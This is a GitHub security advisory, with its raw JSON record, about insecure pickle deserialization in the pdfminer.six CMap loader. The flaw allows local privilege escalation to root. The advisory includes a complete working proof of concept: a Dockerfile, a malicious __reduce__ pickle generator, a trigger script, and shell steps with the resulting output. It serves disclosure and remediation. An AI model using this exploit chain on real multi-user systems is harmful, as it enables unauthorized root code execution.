ghsa-f83h-ghpp-7wcc
Vulnerability from github
Published
2025-11-07 23:17
Modified
2025-11-15 02:27
Summary
Insecure Deserialization (pickle) in pdfminer.six CMap Loader — Local Privesc
Details

🚀 Overview

This report demonstrates a real-world privilege escalation vulnerability in pdfminer.six due to unsafe usage of Python's pickle module for CMap file loading. It shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.

line

🚨 Special Note

This advisory addresses a distinct vulnerability from GHSA-wf5f-4jwr-ppcp (CVE-2025-64512).

While the previous CVE claims to mitigate issues related to unsafe deserialization, the patch introduced in commit b808ee05dd7f0c8ea8ec34bdf394d40e63501086 does not address the vulnerability reported here.

Based on testing performed against the latest version of the library (comparison view), the issue remains exploitable through local privilege escalation due to continued unsafe use of pickle files. The Dockerfile is hence modified to run test against this claim.

This demonstrates that the patch for CVE-2025-64512 is incomplete: the vulnerability remains exploitable. This advisory therefore documents a distinct, independently fixable flaw. A correct remediation must remove the dependency on pickle files (or otherwise eliminate unsafe deserialization) and replace it with a safe, auditable data-handling approach so the library can operate normally without relying on pickle

📚 Table of Contents


🔍 Background

pdfminer.six is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python's pickle module.

🐍 Security Issue: If the CMap search path (CMAP_PATH or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious .pickle.gz file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.


🐍 Vulnerability Description

  • Component: pdfminer.six CMap loading (pdfminer/cmapdb.py)
  • Issue: Loads and deserializes .pickle.gz files using Python’s pickle module, which is unsafe for untrusted data.
  • Exploitability: If a low-privileged user can write to any directory in CMAP_PATH, they can execute code as the user running pdfminer—potentially root or a privileged service.
  • Impact: Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.

line

🎭 Demo Scenario

Environment: - 🐧 Alpine Linux (Docker container) - 👨‍💻 Two users: - user1 (attacker: low-privilege) - root (victim: runs privileged PDF-processing script) - 🗂️ Shared writable directory: /tmp/uploads - 🛣️ CMAP_PATH set to /tmp/uploads for the privileged script - 📦 pdfminer.six installed system-wide

Attack Flow: 1. 🕵️‍♂️ user1 creates a malicious CMap file (Evil.pickle.gz) in /tmp/uploads. 2. 👑 The privileged service (root) processes a PDF or calls get_cmap("Evil"). 3. 💣 The malicious pickle is deserialized, running arbitrary code as root. 4. 🎯 The exploit creates a flag file in /root/pwnedByPdfminer as proof.

line

🧨 Technical Details

  • Vulnerability Type: Insecure deserialization of untrusted data using Python's pickle
  • Attack Prerequisites: Attacker can write to a directory included in CMAP_PATH
  • Vulnerable Line: python return type(str(name), (), pickle.loads(gzfile.read())) In pdfminer/cmapdb.py's _load_data method
  • https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246
  • Proof of Concept: See createEvilPickle.py, evilmod.py, and processPdf.py

Exploit Chain: - Attacker places a malicious .pickle.gz file in the CMap search path. - Privileged process (e.g., root) loads a CMap, triggering pickle deserialization. - Arbitrary code executes with the privilege of the process (root/service account).

line

🔧 Setup and Usage

📁 Files

</> Dockerfile

```yml FROM python:3.11-alpine

ARG PM_COMMIT=b808ee05dd7f0c8ea8ec34bdf394d40e63501086

Install git and build tooling

RUN apk add --no-cache git build-base

WORKDIR /opt

Clone pdfminer.six and check out the specific commit, then install from source

RUN git clone https://github.com/pdfminer/pdfminer.six.git && \ cd pdfminer.six && \ git fetch --all && \ git checkout ${PM_COMMIT} && \ pip install --no-cache-dir -e .

App working directory for PoC

WORKDIR /app

Create low-privilege user and uploads dir

RUN adduser -D user1 && \ mkdir -p /tmp/uploads && \ chown user1:user1 /tmp/uploads && \ chmod 1777 /tmp/uploads

Copy PoC files

COPY evilmod.py /app/evilmod.py COPY createEvilPickle.py /app/createEvilPickle.py COPY processPDF.py /app/processPDF.py

ENV CMAP_PATH=/tmp/uploads ENV PYTHONUNBUFFERED=1

Keep the container running in background so you can exec into it anytime.

CMD ["tail", "-f", "/dev/null"]

```

</> evilmod.py

```python import os

def evilFunc(): with open("/root/pwnedByPdfminer", "w") as f: f.write("ROOTED by pdfminer pickle RCE\n") return {"CODE2CID": {}, "IS_VERTICAL": False} ```

</> createEvilPickle.py

```python import pickle import gzip from evilmod import evilFunc

class Evil: def reduce(self): return (evilFunc, ())

payload = pickle.dumps(Evil()) with gzip.open("/tmp/uploads/Evil.pickle.gz", "wb") as f: f.write(payload)

print("Malicious pickle created at /tmp/uploads/Evil.pickle.gz") ```

</> processPDF.py

```python import os from pdfminer.cmapdb import CMapDB

os.environ["CMAP_PATH"] = "/tmp/uploads"

CMapDB.get_cmap("Evil")

print("CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.") ``` line

1️⃣ Build and start the demo container

bash docker build -t pdfminer-priv-esc-demo . docker run --rm -it --name pdfminer-demo pdfminer-priv-esc-democ

2️⃣ In the container, open two shells in parallel (or switch users in one):

🕵️‍♂️ Shell 1 (Attacker: user1)

```bash su user1 cd /app python createEvilPickle.py

✅ Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1

```

👑 Shell 2 (Victim: root)

```bash cd /app python processPdf.py

🎯 Output: If vulnerable, /root/pwnedByPdfminer will be created

```

3️⃣ Proof of escalation

```bash cat /root/pwnedByPdfminer

🏴 Output: ROOTED by pdfminer pickle RCE

```

proof-of-exploit

line

📝 Step-by-step Walkthrough

  1. user1 uses createEvilPickle.py to craft and place a malicious CMap pickle in a shared upload directory.
  2. The root user runs a typical PDF-processing script, which loads CMap files from that directory.
  3. The exploit triggers, running arbitrary code as root.
  4. The attacker now has proof of code execution as root (and, in a real attack, could escalate further).

line

🛡️ Security Standards & References

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pdfminer.six"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "20251107"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-07T23:17:05Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### \ud83d\ude80 Overview\n\nThis report **demonstrates a real-world privilege escalation** vulnerability in [pdfminer.six](https://github.com/pdfminer/pdfminer.six) due to unsafe usage of Python\u0027s `pickle` module for CMap file loading.\nIt shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udea8 Special Note\n\nThis advisory addresses a distinct vulnerability from [GHSA-wf5f-4jwr-ppcp (CVE-2025-64512)](https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp).\n\nWhile the previous CVE claims to mitigate issues related to unsafe deserialization, the patch introduced in commit [b808ee05dd7f0c8ea8ec34bdf394d40e63501086](https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086) does not address the vulnerability reported here.\n\nBased on testing performed against the latest version of the library ([comparison view](https://github.com/pdfminer/pdfminer.six/compare/20250506...20251107)), the issue remains exploitable through local privilege escalation due to continued unsafe use of pickle files. The **Dockerfile** is hence modified to run test against this claim.\n\nThis demonstrates that the patch for **CVE-2025-64512** is incomplete: the vulnerability remains exploitable. This advisory therefore documents a distinct, independently fixable flaw. A correct remediation must remove the dependency on pickle files (or otherwise eliminate unsafe deserialization) and replace it with a safe, auditable data-handling approach so the library can operate normally without relying on ```pickle```\n\n## \ud83d\udcda Table of Contents\n\n- [\ud83d\udd0d Background](#-background)\n- [\ud83d\udc0d Vulnerability Description](#-vulnerability-description)\n- [\ud83c\udfad Demo Scenario](#-demo-scenario)\n- [\ud83e\udde8 Technical Details](#-technical-details)\n- [\ud83d\udd27 Setup and Usage](#-setup-and-usage)\n- [\ud83d\udcdd Step-by-step Walkthrough](#-step-by-step-walkthrough)\n- [\ud83d\udee1\ufe0f Security Standards \u0026 References](#-security-standards--references)\n---\n\n## \ud83d\udd0d Background\n\n**pdfminer.six** is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python\u0027s `pickle` module.\n\n\u003e \ud83d\udc0d **Security Issue:**\n\u003e If the CMap search path (`CMAP_PATH` or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious `.pickle.gz` file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.\n\n---\n\n### \ud83d\udc0d Vulnerability Description\n\n- **Component:** pdfminer.six CMap loading (`pdfminer/cmapdb.py`)\n- **Issue:** Loads and deserializes `.pickle.gz` files using Python\u2019s `pickle` module, which is unsafe for untrusted data.\n- **Exploitability:** If a low-privileged user can write to any directory in `CMAP_PATH`, they can execute code as the user running pdfminer\u2014potentially root or a privileged service.\n- **Impact:** Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n### \ud83c\udfad Demo Scenario\n\n**Environment:**\n- \ud83d\udc27 Alpine Linux (Docker container)\n- \ud83d\udc68\u200d\ud83d\udcbb Two users:\n  - `user1` (attacker: low-privilege)\n  - `root` (victim: runs privileged PDF-processing script)\n- \ud83d\uddc2\ufe0f Shared writable directory: `/tmp/uploads`\n- \ud83d\udee3\ufe0f `CMAP_PATH` set to `/tmp/uploads` for the privileged script\n- \ud83d\udce6 pdfminer.six installed system-wide\n\n**Attack Flow:**\n1. \ud83d\udd75\ufe0f\u200d\u2642\ufe0f `user1` creates a malicious CMap file (`Evil.pickle.gz`) in `/tmp/uploads`.\n2. \ud83d\udc51 The privileged service (`root`) processes a PDF or calls `get_cmap(\"Evil\")`.\n3. \ud83d\udca3 The malicious pickle is deserialized, running arbitrary code as root.\n4. \ud83c\udfaf The exploit creates a flag file in `/root/pwnedByPdfminer` as proof.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n### \ud83e\udde8 Technical Details\n\n- **Vulnerability Type:** Insecure deserialization of untrusted data using Python\u0027s `pickle`\n- **Attack Prerequisites:** Attacker can write to a directory included in `CMAP_PATH`\n- **Vulnerable Line:**\n  ```python\n  return type(str(name), (), pickle.loads(gzfile.read()))\n  ```\n  *In `pdfminer/cmapdb.py`\u0027s `_load_data` method*\n- https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246\n- **Proof of Concept:** See `createEvilPickle.py`, `evilmod.py`, and `processPdf.py`\n\n**Exploit Chain:**\n- Attacker places a malicious `.pickle.gz` file in the CMap search path.\n- Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.\n- Arbitrary code executes with the privilege of the process (root/service account).\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udd27 Setup and Usage\n\n### \ud83d\udcc1 Files\n#### \u003c/\u003e Dockerfile\n```yml\nFROM python:3.11-alpine\n\nARG PM_COMMIT=b808ee05dd7f0c8ea8ec34bdf394d40e63501086\n\n# Install git and build tooling\nRUN apk add --no-cache git build-base\n\nWORKDIR /opt\n\n# Clone pdfminer.six and check out the specific commit, then install from source\nRUN git clone https://github.com/pdfminer/pdfminer.six.git \u0026\u0026 \\\n    cd pdfminer.six \u0026\u0026 \\\n    git fetch --all \u0026\u0026 \\\n    git checkout ${PM_COMMIT} \u0026\u0026 \\\n    pip install --no-cache-dir -e .\n\n# App working directory for PoC\nWORKDIR /app\n\n# Create low-privilege user and uploads dir\nRUN adduser -D user1 \u0026\u0026 \\\n    mkdir -p /tmp/uploads \u0026\u0026 \\\n    chown user1:user1 /tmp/uploads \u0026\u0026 \\\n    chmod 1777 /tmp/uploads\n\n# Copy PoC files\nCOPY evilmod.py /app/evilmod.py\nCOPY createEvilPickle.py /app/createEvilPickle.py\nCOPY processPDF.py /app/processPDF.py\n\nENV CMAP_PATH=/tmp/uploads\nENV PYTHONUNBUFFERED=1\n\n# Keep the container running in background so you can exec into it anytime.\nCMD [\"tail\", \"-f\", \"/dev/null\"]\n\n```\n\n#### \u003c/\u003e evilmod.py\n```python\nimport os\n\ndef evilFunc():\n    with open(\"/root/pwnedByPdfminer\", \"w\") as f:\n        f.write(\"ROOTED by pdfminer pickle RCE\\n\")\n    return {\"CODE2CID\": {}, \"IS_VERTICAL\": False}\n```\n#### \u003c/\u003e createEvilPickle.py\n```python\nimport pickle\nimport gzip\nfrom evilmod import evilFunc\n\nclass Evil:\n    def __reduce__(self):\n        return (evilFunc, ())\n\npayload = pickle.dumps(Evil())\nwith gzip.open(\"/tmp/uploads/Evil.pickle.gz\", \"wb\") as f:\n    f.write(payload)\n\nprint(\"Malicious pickle created at /tmp/uploads/Evil.pickle.gz\")\n```\n#### \u003c/\u003e processPDF.py\n```python\nimport os\nfrom pdfminer.cmapdb import CMapDB\n\nos.environ[\"CMAP_PATH\"] = \"/tmp/uploads\"\n\nCMapDB.get_cmap(\"Evil\")\n\nprint(\"CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.\")\n```\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n### 1\ufe0f\u20e3 Build and start the demo container\n\n```bash\ndocker build -t pdfminer-priv-esc-demo .\ndocker run --rm -it --name pdfminer-demo pdfminer-priv-esc-democ\n```\n\n### 2\ufe0f\u20e3 In the container, open two shells in parallel (or switch users in one):\n\n#### \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Shell 1 (Attacker: user1)\n```bash\nsu user1\ncd /app\npython createEvilPickle.py\n# \u2705 Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1\n```\n\n#### \ud83d\udc51 Shell 2 (Victim: root)\n```bash\ncd /app\npython processPdf.py\n# \ud83c\udfaf Output: If vulnerable, /root/pwnedByPdfminer will be created\n```\n\n### 3\ufe0f\u20e3 Proof of escalation\n\n```bash\ncat /root/pwnedByPdfminer\n# \ud83c\udff4 Output: ROOTED by pdfminer pickle RCE\n```\n\n\u003cimg width=\"815\" height=\"889\" alt=\"proof-of-exploit\" src=\"https://github.com/user-attachments/assets/f465d17c-a3af-49c5-9dbc-eec9635b36fc\" /\u003e\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udcdd Step-by-step Walkthrough\n\n1. **user1** uses `createEvilPickle.py` to craft and place a malicious CMap pickle in a shared upload directory.\n2. The **root** user runs a typical PDF-processing script, which loads CMap files from that directory.\n3. The exploit triggers, running arbitrary code as root.\n4. The attacker now has proof of code execution as root (and, in a real attack, could escalate further).\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udee1\ufe0f Security Standards \u0026 References\n\n- **CVSS (Common Vulnerability Scoring System):**\n  - **Base Score:** 7.8 (High)\n  - **Vector:** `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`\n\n- **OWASP Top 10:**\n  - [A08:2021 - Software and Data Integrity Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)\n  - [A03:2021 - Injection](https://owasp.org/Top10/A03_2021-Injection/) (by analogy, as it\u0027s code injection via deserialization)\n\n- **MITRE CWE References:**\n  - [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n  - [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n\n- **MITRE ATT\u0026CK Techniques:**\n  - [T1055: Process Injection](https://attack.mitre.org/techniques/T1055/)\n  - [T1548: Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548/)",
  "id": "GHSA-f83h-ghpp-7wcc",
  "modified": "2025-11-15T02:27:59Z",
  "published": "2025-11-07T23:17:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-f83h-ghpp-7wcc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pdfminer/pdfminer.six"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Insecure Deserialization (pickle) in pdfminer.six CMap Loader \u2014 Local Privesc"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…